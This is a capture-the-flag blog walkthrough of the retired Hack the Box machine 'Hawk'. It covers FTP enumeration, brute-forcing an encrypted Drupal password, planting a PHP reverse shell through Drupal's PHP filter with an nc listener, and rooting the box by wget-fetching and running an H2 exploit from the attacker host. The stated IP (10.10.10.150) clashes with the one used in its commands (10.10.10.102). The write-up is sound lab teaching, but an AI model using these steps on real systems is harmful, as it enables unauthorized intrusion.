Capture the flag (CTF)

Hack the Box (HTB) machines walkthrough series — Hawk

Security Ninja
July 2, 2019 by
Security Ninja

Today, we will be continuing with our exploration of Hack the Box (HTB) machines as seen in previous articles. This walkthrough is of an HTB machine named Hawk.

HTB is an excellent platform that hosts machines belonging to multiple OSes. It also has some other challenges as well. Individuals have to solve the puzzle (simple enumeration plus pentest)  in order to log into the platform and download the VPN pack to connect to the machines hosted on the HTB platform.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Note: Only write-ups of retired HTB machines are allowed. The machine in this article, named Hawk, is retired.


The walkthrough

Let’s start with this machine.

1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.

2. The Hawk machine IP is 10.10.10.150.

3. We will adopt the same methodology of performing penetration testing as we have used previously. Let’s start with enumeration in order to learn as much about the machine as possible.

4. As usual, let’s start with the Nmap scan to gather more information about the services running on this machine. [CLICK IMAGES TO ENLARGE]
<<nmap -sC -sV -oA Hawk 10.10.10.102>>

5. As we can see, we have ports 21, 22, 80 and 8082 open. All others are known ports, so let’s dig around on port 8082. Running the Nmap scan indicates that it is a H2 service.
<<nmap -sC -sV -p 8082 10.10.10.102>>

6. OK, so let’s start enumerating with discovered ports. Let’s ftp on port 21. It looks like an anonymous login worked on this box.
<<ftp 10.10.10.102>>

7. Enumerating the directory contents reveals a .drupal.txt.enc file.

<<ls -la>>

<<get .drupal.txt.enc>>

8. Transfer the file to the attacking box. Examining the file type, it’s revealed as a Base64-encoded file with salted password.
<<file .drupal.txt.enc>>

9. The above file type can be easily brute-forced using a utility mentioned here. As shown below, the binary was built first and then run to perform the brute-force option. It reveals the password of the portal.

<<go build -o openssl-brute>>

<<./openssl-brute -file ../.drupal.txt.enc>>

10. Since we have also discovered port 80, below is the landing page. Let’s try the username admin with the password discovered above.

11. The above combination of username and password worked, and we are now in the portal.

12. Enumerating the portal under modules, we can enable the PHP filter which will allow the execution of PHP code/snippets. Make sure to save the filter as well.

13. Now we can embed a PHP page by creating a new Basic page under Add content → Basic. Add the PHP one-liner, as shown below:

14. Save the page text format as PHP code. Note that this option will only appear if point 12 is followed.

15. Set up an NC listener on our attacking machine and click on View for the page created above.

16. As soon as the page is rendered, the PHP code will be executed, and we’ll get a reverse shell back.
<<nc -nlvp 1234>>

17. Enumerating to grab the user.txt flag.

<<cd /home>>

<<cd daniel>>

<<cat user.txt>>

18. Now let’s start the enumeration again to escalate privileges from the current shell.

19. As is stated in the series, one of the checks to perform is to see what processes are running as root. Here we have the H2 service running as root. This service was also discovered during the initial Nmap scan. We also get the service version as well.

20. Googling the version gives us possible exploits to try for this service as shown below. Exploit 45506 is a build-up on exploit 44422. In exploit 45506, a DB is created with username “sa” and password ‘’.”

21. Download the above exploit and then transfer it to the /tmp location on the target box.

22. Once it is transported, then use python3 on the box to execute the exploit.

<<cd /tmp>>

<<wget http://10.10.14.3/exploit.py>>

<<python3 exploit.py>>

23. After executing the exploit, we are now root.

24. Enumerating to grab the root.txt flag.
<<cat root.txt>>

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

This was a straightforward box where 99% of the work was achieved with enumeration and the remaining 1% with its execution to grab root shell. We will continue this series with more HTB machines like this.

Security Ninja
Security Ninja